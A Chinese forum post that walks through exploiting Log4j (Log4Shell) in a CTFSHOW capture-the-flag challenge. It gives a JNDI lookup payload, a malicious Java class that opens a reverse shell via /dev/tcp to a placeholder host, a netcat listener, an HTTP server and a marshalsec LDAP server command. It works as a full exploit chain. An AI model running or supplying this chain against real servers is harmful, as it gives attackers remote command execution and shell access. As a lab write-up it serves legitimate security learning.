首页
社区
课程
招聘
[原创]CTFSHOWLog4j复现
2021-12-23 11:59 12045

[原创]CTFSHOWLog4j复现

2021-12-23 11:59
12045

 

今天上午刚刚看完这个洞,自己复现了一下,晚上就看到了上题正好打一下玩玩

 

 

多明显的输入框,嘿嘿嘿

 

这不得来一个

1
${jndi:ldap://dnslog.com/exp} (bushi

0x01 准备工作

首先准备好恶意Java类

1
2
3
4
5
6
7
8
9
10
11
12
public class Test {
        static{
            try {
                Runtime r = Runtime.getRuntime();
                String cmd[]= {"/bin/bash","-c","exec 5<>/dev/tcp/xxx/50025;cat <&5 | while read line; do $line 2>&5 >&5; done"};
                Process p = r.exec(cmd);
                p.waitFor();
            }catch (Exception e){
                e.printStackTrace();
            }
        }
}

能弹shell就行,怎么写都行

 

然后准备好marshalsec-0.0.3-SNAPSHOT-all.jar

0x02 监听端口

1
nc -lvnp 50025

0x03 起http服务

1
python3 -m http.server 50026

 

注意这里要在恶意Java类的目录下起http服务

0x04 起LDAP服务

1
java -cp ./marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://xxx:50026/#Test"

这里的端口要和http服务的端口一致!!

 

0x05 干他!

喜闻乐见的的地方来了

 

 

点击submit

 

 

可以看到这里已经加载了恶意类,而我们监听的端口已经反弹到了shell

 

 

打完收工!


[CTF入门培训]顶尖高校博士及硕士团队亲授《30小时教你玩转CTF》,视频+靶场+题目!助力进入CTF世界

收藏
点赞2
打赏
分享
最新回复 (0)
游客
登录 | 注册 方可回帖
返回